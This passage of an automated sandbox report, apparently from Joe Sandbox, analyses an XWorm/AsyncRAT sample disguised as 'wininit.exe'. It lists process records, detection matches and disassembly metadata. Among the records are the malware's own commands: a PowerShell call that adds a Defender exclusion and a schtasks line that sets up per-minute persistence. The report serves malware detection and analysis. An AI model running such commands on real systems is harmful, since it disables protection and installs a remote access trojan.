                                                                Start date:04/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:14
                                                                Start time:10:27:16
                                                                Start date:04/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wininit.exe'
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:15
                                                                Start time:10:27:16
                                                                Start date:04/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:16
                                                                Start time:10:27:36
                                                                Start date:04/12/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wininit" /tr "C:\Users\user\AppData\Roaming\wininit.exe"
                                                                Imagebase:0x7ff7268f0000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:17
                                                                Start time:10:27:36
                                                                Start date:04/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:18
                                                                Start time:10:27:38
                                                                Start date:04/12/2024
                                                                Path:C:\Users\user\AppData\Roaming\wininit.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\AppData\Roaming\wininit.exe
                                                                Imagebase:0xde0000
                                                                File size:77'824 bytes
                                                                MD5 hash:DC8534F103A3167CEC27B4B01FEA89A4
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\wininit.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\wininit.exe, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\wininit.exe, Author: ditekSHen
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 92%, ReversingLabs
                                                                Has exited:true

                                                                General

                                                                Target ID:19
                                                                Start time:10:27:48
                                                                Start date:04/12/2024
                                                                Path:C:\Users\user\AppData\Roaming\wininit.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\AppData\Roaming\wininit.exe"
                                                                Imagebase:0x6e0000
                                                                File size:77'824 bytes
                                                                MD5 hash:DC8534F103A3167CEC27B4B01FEA89A4
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:21.2%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:40%
                                                                  Total number of Nodes:10
                                                                  Total number of Limit Nodes:1

                                                                  Executed Functions

                                                                  Function 00007FF848AE9B09 Relevance: 4.3, Strings: 2, Instructions: 1812COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 7ff848ae9b09-7ff848ae9b39 call 7ff848ae8f40 5 7ff848ae9b3c-7ff848ae9b9d call 7ff848ae0388 call 7ff848ae80d8 0->5 12 7ff848ae9bd1-7ff848ae9bf4 5->12 13 7ff848ae9b9f-7ff848ae9bb1 5->13 18 7ff848aeacad-7ff848aeacb4 12->18 19 7ff848ae9bfa-7ff848ae9c07 12->19 13->5 15 7ff848ae9bb3-7ff848ae9bcc call 7ff848ae0398 13->15 15->12 22 7ff848aeacbe-7ff848aeacc5 18->22 20 7ff848ae9c0d-7ff848ae9c4b 19->20 21 7ff848ae9f68 19->21 28 7ff848ae9c51-7ff848ae9c6e call 7ff848ae8358 20->28 29 7ff848aeac88-7ff848aeac8e 20->29 26 7ff848ae9f6d-7ff848ae9fa1 21->26 23 7ff848aeacd6-7ff848aeacdd 22->23 24 7ff848aeacc7-7ff848aeacd1 call 7ff848ae0378 22->24 24->23 30 7ff848ae9fa8-7ff848ae9fea 26->30 28->29 37 7ff848ae9c74-7ff848ae9cae 28->37 31 7ff848aeace2 29->31 32 7ff848aeac90-7ff848aeaca7 29->32 48 7ff848aea00f-7ff848aea043 30->48 49 7ff848ae9fec-7ff848aea00d 30->49 36 7ff848aeace7-7ff848aead22 31->36 32->18 32->19 42 7ff848aead27-7ff848aead74 36->42 45 7ff848ae9cb0-7ff848ae9d03 37->45 46 7ff848ae9d0d-7ff848ae9d35 37->46 72 7ff848aead76-7ff848aead97 42->72 73 7ff848aead9c-7ff848aeadd7 42->73 45->46 55 7ff848ae9d3b-7ff848ae9d48 46->55 56 7ff848aea629-7ff848aea651 46->56 54 7ff848aea04a-7ff848aea08c 48->54 49->54 79 7ff848aea0b1-7ff848aea0e5 54->79 80 7ff848aea08e-7ff848aea0af 54->80 55->21 57 7ff848ae9d4e-7ff848ae9e40 55->57 56->29 65 7ff848aea657-7ff848aea664 56->65 139 7ff848ae9e46-7ff848ae9f43 call 7ff848ae0358 57->139 140 7ff848aea600-7ff848aea606 57->140 65->21 67 7ff848aea66a-7ff848aea760 65->67 84 7ff848aeaddc-7ff848aeae17 67->84 122 7ff848aea766-7ff848aea7c9 67->122 72->73 73->84 86 7ff848aea0ec-7ff848aea203 call 7ff848ae0358 79->86 80->86 94 7ff848aeae1c-7ff848aeae57 84->94 164 7ff848aea205-7ff848aea226 86->164 165 7ff848aea228-7ff848aea25c 86->165 104 7ff848aeae5c-7ff848aeae97 94->104 112 7ff848aeae9c-7ff848aeaed7 104->112 120 7ff848aeaedc-7ff848aeaf17 112->120 130 7ff848aeaf1c-7ff848aeaf6c 120->130 122->94 146 7ff848aea7cf-7ff848aea832 122->146 155 7ff848aeaf94-7ff848aeafc8 130->155 156 7ff848aeaf6e-7ff848aeaf8f 130->156 139->26 195 7ff848ae9f45-7ff848ae9f66 139->195 140->31 141 7ff848aea60c-7ff848aea623 140->141 141->55 141->56 146->104 172 7ff848aea838-7ff848aea996 call 7ff848ae82d8 146->172 162 7ff848aeafcf 155->162 156->155 162->162 167 7ff848aea263-7ff848aea2fa 164->167 165->167 167->21 198 7ff848aea300-7ff848aea4b0 call 7ff848ae0358 167->198 172->112 221 7ff848aea99c-7ff848aeab0a 172->221 195->30 198->31 245 7ff848aea4b6-7ff848aea4b8 198->245 221->31 259 7ff848aeab10-7ff848aeab12 221->259 245->42 246 7ff848aea4be-7ff848aea4fc 245->246 246->36 256 7ff848aea502-7ff848aea58d 246->256 271 7ff848aea58f-7ff848aea5d6 256->271 272 7ff848aea5dd-7ff848aea5fa 256->272 259->130 261 7ff848aeab18-7ff848aeab56 259->261 261->120 270 7ff848aeab5c-7ff848aeab99 261->270 276 7ff848aeac15-7ff848aeac33 270->276 277 7ff848aeab9b-7ff848aeabea 270->277 271->272 272->140 279 7ff848aeac3a-7ff848aeac69 276->279 277->279 285 7ff848aeabec-7ff848aeac08 277->285 279->31 280 7ff848aeac6b-7ff848aeac82 279->280 280->65 281 7ff848aeac84 280->281 285->281 287 7ff848aeac0a-7ff848aeac13 285->287 287->276
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3297887029.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$CAO_^
                                                                  • API String ID: 0-2234428381
                                                                  • Opcode ID: 11a4a42d160b04b638e260c5483b3a06835b4fd157f06c4ecdacdbfd30a61e19
                                                                  • Instruction ID: dda29ab5e3f16f55741f5d637c88a08ee2e8023bd37b398bb47f3429a08734cb
                                                                  • Opcode Fuzzy Hash: 11a4a42d160b04b638e260c5483b3a06835b4fd157f06c4ecdacdbfd30a61e19
                                                                  • Instruction Fuzzy Hash: A0D29570A28A099FE758EF28C49677DB7E2FF98744F144579D40DD3291DF38A8818B42
                                                                  Function 00007FF848AE1719 Relevance: 1.9, Strings: 1, Instructions: 694COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3297887029.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CAO_^
                                                                  • API String ID: 0-3111533842
                                                                  • Opcode ID: fbeb76c07dccb8885b46975a740014b6e4cd3a99813d9cff82e826bcd989b901
                                                                  • Instruction ID: e7e40d048af00b65d52b666c426ecf9780a4d77f7bc101baf77e5bd78ffc5cdb
                                                                  • Opcode Fuzzy Hash: fbeb76c07dccb8885b46975a740014b6e4cd3a99813d9cff82e826bcd989b901
                                                                  • Instruction Fuzzy Hash: 7B22B220B6DA5A5FE798FB38945A3BD77D2FF88780F440979D40EC3282DE6C68018756
                                                                  Function 00007FF848AE7A71 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 582 7ff848ae7a71-7ff848ae7a89 583 7ff848ae7a41-7ff848ae7a6c 582->583 584 7ff848ae7a8b-7ff848ae7b2d CheckRemoteDebuggerPresent 582->584 590 7ff848ae7b35-7ff848ae7b78 584->590 591 7ff848ae7b2f 584->591 591->590
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3297887029.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID: CheckDebuggerPresentRemote
                                                                  • String ID:
                                                                  • API String ID: 3662101638-0
                                                                  • Opcode ID: ae9ac83929c18b7e553047efc8ce2381df93420c1d4efb8eb5bdb0f3af18baf3
                                                                  • Instruction ID: 79f4ed2738fd7b8014dd3c4a3f76d9267ecd3a43e9ec0fc29e35e07a67a06124
                                                                  • Opcode Fuzzy Hash: ae9ac83929c18b7e553047efc8ce2381df93420c1d4efb8eb5bdb0f3af18baf3
                                                                  • Instruction Fuzzy Hash: 9141223190861C8FCB58EF68C88A6FD7BE0FF65321F04426BD449C7292DB38A945CB91
                                                                  Function 00007FF848AE60C6 Relevance: .5, Instructions: 472COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 941 7ff848ae60c6-7ff848ae60d3 942 7ff848ae60d5-7ff848ae60dd 941->942 943 7ff848ae60de-7ff848ae61a7 941->943 942->943 947 7ff848ae6213 943->947 948 7ff848ae61a9-7ff848ae61b2 943->948 950 7ff848ae6215-7ff848ae623a 947->950 948->947 949 7ff848ae61b4-7ff848ae61c0 948->949 951 7ff848ae61c2-7ff848ae61d4 949->951 952 7ff848ae61f9-7ff848ae6211 949->952 957 7ff848ae62a6 950->957 958 7ff848ae623c-7ff848ae6245 950->958 953 7ff848ae61d6 951->953 954 7ff848ae61d8-7ff848ae61eb 951->954 952->950 953->954 954->954 956 7ff848ae61ed-7ff848ae61f5 954->956 956->952 960 7ff848ae62a8-7ff848ae6350 957->960 958->957 959 7ff848ae6247-7ff848ae6253 958->959 961 7ff848ae6255-7ff848ae6267 959->961 962 7ff848ae628c-7ff848ae62a4 959->962 971 7ff848ae6352-7ff848ae635c 960->971 972 7ff848ae63be 960->972 963 7ff848ae6269 961->963 964 7ff848ae626b-7ff848ae627e 961->964 962->960 963->964 964->964 966 7ff848ae6280-7ff848ae6288 964->966 966->962 971->972 973 7ff848ae635e-7ff848ae636b 971->973 974 7ff848ae63c0-7ff848ae63e9 972->974 975 7ff848ae63a4-7ff848ae63bc 973->975 976 7ff848ae636d-7ff848ae637f 973->976 981 7ff848ae6453 974->981 982 7ff848ae63eb-7ff848ae63f6 974->982 975->974 977 7ff848ae6381 976->977 978 7ff848ae6383-7ff848ae6396 976->978 977->978 978->978 980 7ff848ae6398-7ff848ae63a0 978->980 980->975 983 7ff848ae6455-7ff848ae64e6 981->983 982->981 984 7ff848ae63f8-7ff848ae6406 982->984 992 7ff848ae64ec-7ff848ae64fb 983->992 985 7ff848ae643f-7ff848ae6451 984->985 986 7ff848ae6408-7ff848ae641a 984->986 985->983 988 7ff848ae641c 986->988 989 7ff848ae641e-7ff848ae6431 986->989 988->989 989->989 990 7ff848ae6433-7ff848ae643b 989->990 990->985 993 7ff848ae6503-7ff848ae6568 call 7ff848ae6584 992->993 994 7ff848ae64fd 992->994 1001 7ff848ae656f-7ff848ae6583 993->1001 1002 7ff848ae656a 993->1002 994->993 1002->1001
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3297887029.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b62815b0ca3db570befe60db523db9ad95a153e221dc421f935166d78357e1db
                                                                  • Instruction ID: a761e4a67d496fc4782a4128f827b69d4637e546ae0086be0e49bf0607b4ee52
                                                                  • Opcode Fuzzy Hash: b62815b0ca3db570befe60db523db9ad95a153e221dc421f935166d78357e1db
                                                                  • Instruction Fuzzy Hash: E9F1A03090DA8E8FEBA8EF28C8567F977D1FB54350F04466AD84DC7295CB789844CB92
                                                                  Function 00007FF848AE7272 Relevance: .5, Instructions: 458COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3297887029.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 08b82b2cc041c36a70750fd3434b6a95a7b656b2f36b4c55a0755710c3fd40b1
                                                                  • Instruction ID: c9db147ebcb0d235bc1d696412d0fd4e190a40193fe34596d3bee19ca1d50f78
                                                                  • Opcode Fuzzy Hash: 08b82b2cc041c36a70750fd3434b6a95a7b656b2f36b4c55a0755710c3fd40b1
                                                                  • Instruction Fuzzy Hash: 44E1B33090DA4E8FEBA8EF28C8567F977D1FF64350F04466AD84DC7691CB7898448B92
                                                                  Function 00007FF848AE20F5 Relevance: .2, Instructions: 208COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3297887029.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cf6a70a42b27df3eb3b8b583039c41156d9b41cacfb4fa5bdd99e7b4b73204e2
                                                                  • Instruction ID: e05882eeeed0cf86f03633f35fcbcd6911b8c09eef720eb96bb18593225c34ff
                                                                  • Opcode Fuzzy Hash: cf6a70a42b27df3eb3b8b583039c41156d9b41cacfb4fa5bdd99e7b4b73204e2
                                                                  • Instruction Fuzzy Hash: D1512E20A5E6C94FD787AB38582527A7FE4DF8B269F0804FBE089C7193DE5C0806C356
                                                                  Function 00007FF848AE995D Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 575 7ff848ae995d-7ff848ae9a40 RtlSetProcessIsCritical 579 7ff848ae9a42 575->579 580 7ff848ae9a48-7ff848ae9a7d 575->580 579->580
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3297887029.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalProcess
                                                                  • String ID:
                                                                  • API String ID: 2695349919-0
                                                                  • Opcode ID: 106029ca05b2d1e870be312952978a5b635dd4759ab187157ad6e5e30a8683b6
                                                                  • Instruction ID: 48067e737c9acda7b8740f98009354f4302fcead8d7ab3ddef862234ce9246f9
                                                                  • Opcode Fuzzy Hash: 106029ca05b2d1e870be312952978a5b635dd4759ab187157ad6e5e30a8683b6
                                                                  • Instruction Fuzzy Hash: 6241B43180D6588FD719DFA8D845BE9BBF0FF56311F04416ED08AD3592CB786846CB91
                                                                  Function 00007FF848AEB638 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 593 7ff848aeb638-7ff848aeb63f 594 7ff848aeb641-7ff848aeb649 593->594 595 7ff848aeb64a-7ff848aeb6bd 593->595 594->595 599 7ff848aeb6c3-7ff848aeb6d0 595->599 600 7ff848aeb749-7ff848aeb74d 595->600 601 7ff848aeb6d2-7ff848aeb70f SetWindowsHookExW 599->601 600->601 603 7ff848aeb717-7ff848aeb748 601->603 604 7ff848aeb711 601->604 604->603
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3297887029.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: ee626ffe6f7f7ac883a0aeeda697c527d154f56fe7ea0156e54e8279e6578513
                                                                  • Instruction ID: b467203f2205c2adf2e87cfd939d79fe6d3b25a233138bf8246bf4bcfa09c15c
                                                                  • Opcode Fuzzy Hash: ee626ffe6f7f7ac883a0aeeda697c527d154f56fe7ea0156e54e8279e6578513
                                                                  • Instruction Fuzzy Hash: F8411530A0DA4D4FDB58EF6C984A6FDBBE1EB59321F00027ED049D3292CA74A81687D1

                                                                  Executed Functions

                                                                  Function 00007FF848BB6605 Relevance: .4, Instructions: 436COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2662522729.00007FF848BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848bb0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5bed7c43d6f2a5f2ddc855861eaab309df7f09a760d228e79f3ffff15a7dfd7d
                                                                  • Instruction ID: 68134b06ddaa2cf2bbcd18cd37f40630064692e05d978092f2fa808353b1e4c3
                                                                  • Opcode Fuzzy Hash: 5bed7c43d6f2a5f2ddc855861eaab309df7f09a760d228e79f3ffff15a7dfd7d
                                                                  • Instruction Fuzzy Hash: 87D11131D0EA8A5FEB96AB2858555B57BA0FF26390F0801FFD44DCB8D3EA18AC05C355
                                                                  Function 00007FF848AE9F63 Relevance: .2, Instructions: 204COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2662147284.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aca073886b4958e6bdeaf7545c6d0d26c7efda9c9b31f207c2fb8670c2da54ed
                                                                  • Instruction ID: 7a3c99491b718c48db68badc91cd66e5e1aa782f8b324864d939db3c091a4a6d
                                                                  • Opcode Fuzzy Hash: aca073886b4958e6bdeaf7545c6d0d26c7efda9c9b31f207c2fb8670c2da54ed
                                                                  • Instruction Fuzzy Hash: 8C51E07390E6954FD302FB6CA8AB0FD7BA0EF11259F0804B7C5888B063EE5D14958796
                                                                  Function 00007FF848AE9758 Relevance: .1, Instructions: 132COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2662147284.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5644e24e22c3b43d5efbb667a1ff7f0a14e40f09b01f879cdc54b69c5c73993f
                                                                  • Instruction ID: 2f302f6f45dcd9e40f49c2b25c5061783528a3c0d36a8b9860b90db328159419
                                                                  • Opcode Fuzzy Hash: 5644e24e22c3b43d5efbb667a1ff7f0a14e40f09b01f879cdc54b69c5c73993f
                                                                  • Instruction Fuzzy Hash: 7231063191CB489FEB58DF1CA8466BCBBE0FB99710F04412FE44993252DA64A8568BC3
                                                                  Function 00007FF8489CE380 Relevance: .1, Instructions: 126COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2661747485.00007FF8489CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489CD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff8489cd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 281bcd669872c328970565ceb458ae01fb6a402d08d0218fc8e5ff95aeae2b7f
                                                                  • Instruction ID: 25a0b2359f956266d178131e16028c78515926bf1c8bd9c7d9110740f29e45a8
                                                                  • Opcode Fuzzy Hash: 281bcd669872c328970565ceb458ae01fb6a402d08d0218fc8e5ff95aeae2b7f
                                                                  • Instruction Fuzzy Hash: 4C41F07080DBC44FE7569B28E849A563FB0EF56361F1502EFD089CB1A3D726B846C792
                                                                  Function 00007FF848AEA47C Relevance: .1, Instructions: 105COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2662147284.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 80a651d4104f7d5609300ffb206b7866c7328e8a2a9e6be440c54a1c427fca15
                                                                  • Instruction ID: 6a78bdde82179dee1e6c5312afb4ef83c03f492b2d008f0ce9e4854c1fbf9f62
                                                                  • Opcode Fuzzy Hash: 80a651d4104f7d5609300ffb206b7866c7328e8a2a9e6be440c54a1c427fca15
                                                                  • Instruction Fuzzy Hash: EC313B3090D74C4FEB59DF6C984A6F97FE0EB9A320F04416BD048C7152D774A45AC7A2
                                                                  Function 00007FF848BB4465 Relevance: .1, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2662522729.00007FF848BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848bb0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 78047a2a044697fb2662257cd5ce3d9aee639c8ad2b03ec894f35aadf6e34570
                                                                  • Instruction ID: d0fb87485b6f2d2c3162af878dcaff498d6ab993bc303d6eac5fd61bf2c077f0
                                                                  • Opcode Fuzzy Hash: 78047a2a044697fb2662257cd5ce3d9aee639c8ad2b03ec894f35aadf6e34570
                                                                  • Instruction Fuzzy Hash: F5118B32B0C9098FDB99EA0CE4419E873E1FF98730B5400BBD20ACB562DA25EC55C784
                                                                  Function 00007FF848AE33B5 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2662147284.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                  • Instruction ID: bd3adfa385975d6a6da2b834c67da4ca9a38c3adf2169c116a024e76d5fb9c34
                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                  • Instruction Fuzzy Hash: B601447115CB094FDB44EF0CE451AA9B7E0FB95364F10056DE58AC3651DA26E882CB46
                                                                  Function 00007FF848BB414D Relevance: .0, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2662522729.00007FF848BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848bb0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 62954256b4cdda4b3551d97216ca72fee6b3091f8ea6e9260ec13ac2d32fc0aa
                                                                  • Instruction ID: 7e8fd81c7faf4927cc3248772064b9d2a1c3ea77d5152033b42c1397feeb38ba
                                                                  • Opcode Fuzzy Hash: 62954256b4cdda4b3551d97216ca72fee6b3091f8ea6e9260ec13ac2d32fc0aa
                                                                  • Instruction Fuzzy Hash: BBF0BE32E0D9458FD758EB0CE4014E877E0FF64360B1200BAE21DC79A3CB26EC418799
                                                                  Function 00007FF848BB4400 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2662522729.00007FF848BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848bb0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 95daf26b3e57229812fa530e816d4d83de664b56ea1f182fdf8786e17b855645
                                                                  • Instruction ID: 4c5051a7eb61fd14ba60907133ba628866529fc6c778562c3e78ab170d185fad
                                                                  • Opcode Fuzzy Hash: 95daf26b3e57229812fa530e816d4d83de664b56ea1f182fdf8786e17b855645
                                                                  • Instruction Fuzzy Hash: 0FF0E231A0D5458FDB54EB0CE0414E877E0FF04320B0200BAE20DCB963CB26EC60C764
                                                                  Function 00007FF848BB41D1 Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2662522729.00007FF848BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848bb0000_powershell.jbxd
                                                                  Similarity
